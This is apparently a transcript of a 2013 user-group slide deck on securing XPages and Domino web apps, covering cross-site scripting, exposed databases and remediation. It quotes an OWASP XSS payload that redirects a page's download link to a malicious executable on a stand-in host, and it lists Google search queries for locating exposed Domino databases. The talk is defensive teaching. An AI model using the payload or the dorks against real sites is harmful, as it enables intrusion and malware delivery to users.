mwlug2013 - can your xpage codes stand up to hackers?
DESCRIPTION
Presentation at the 2013 MWLUG (Midwest Lotus User's Group) regional meeting. - Explore vulnerabilities in current Dominos sites. - Describe why it is important for Xpage developers to be aware of security issues - Show simple remediation steps.TRANSCRIPT
![Page 1: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/1.jpg)
Can your Xpage App Stand Up to Criminals?
Bernie Leung
MESA TechnologyBernie Leung
MESA Technology
![Page 2: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/2.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
![Page 3: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/3.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Not another Domino Security Talk, Right?
![Page 4: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/4.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Not another Domino Security Talk, Right?
![Page 5: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/5.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
How to Secure Domino Server
![Page 6: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/6.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Then what are these doing here?
![Page 7: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/7.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Controlled Environment ? …. No More
![Page 8: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/8.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Vulnerability
![Page 9: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/9.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Topics:
1. XSS2. Security by Obscurity3. What can we do about it?
And DEMOS's - open your laptop and follow
![Page 10: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/10.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Anatomy of Xpages Web App
<xp: ..... >
![Page 11: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/11.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Anatomy of XPages
<xp: ..... >
![Page 12: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/12.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
![Page 13: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/13.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
![Page 14: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/14.jpg)
![Page 15: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/15.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
![Page 16: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/16.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Cross Site Scripting
Why is it Bad?
demo.
![Page 17: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/17.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
![Page 18: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/18.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
![Page 19: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/19.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
XSS – non persistent
For example, consider a site that has a welcome notice " Welcome %username% " and a download link
Instead you enterhttp://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>
*Sample copied from OWASP
![Page 20: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/20.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
XSS – persistent
User form input, stored and later retrieved by others
*Sample copied from OWASP
![Page 21: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/21.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
In jsp,
Include JSTL (java standard tag lib)And output via c:out value="${outputWords}”
In Domino,
Add to NOTES.ini DominoValidateFramesetSRC=1
Fixing the Vulnerability
![Page 22: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/22.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
How Many other Libraries Do You Use?
Are you bringing in vulnerabilities?
![Page 23: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/23.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Security by Obscurity
![Page 24: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/24.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Another Common Vulnerability
Sensitive nsf open to public
Google is our frien-emy
inurl:/ibmsxpresinurl:/names.nsfinurl:/todo.nsf
![Page 25: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/25.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
DEMO
![Page 26: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/26.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Keeping Up with the Bad Guys
IBM AppScan
Open Source
![Page 27: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/27.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
DEMO
How I Found the VulnerabilitiesUsing IBM AppScan
![Page 28: Mwlug2013 - can your Xpage codes stand up to hackers?](https://reader036.vdocument.in/reader036/viewer/2022062418/556936fbd8b42add468b5236/html5/thumbnails/28.jpg)
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Thank You and Be Safe.
Contact Bernie Leung [email protected]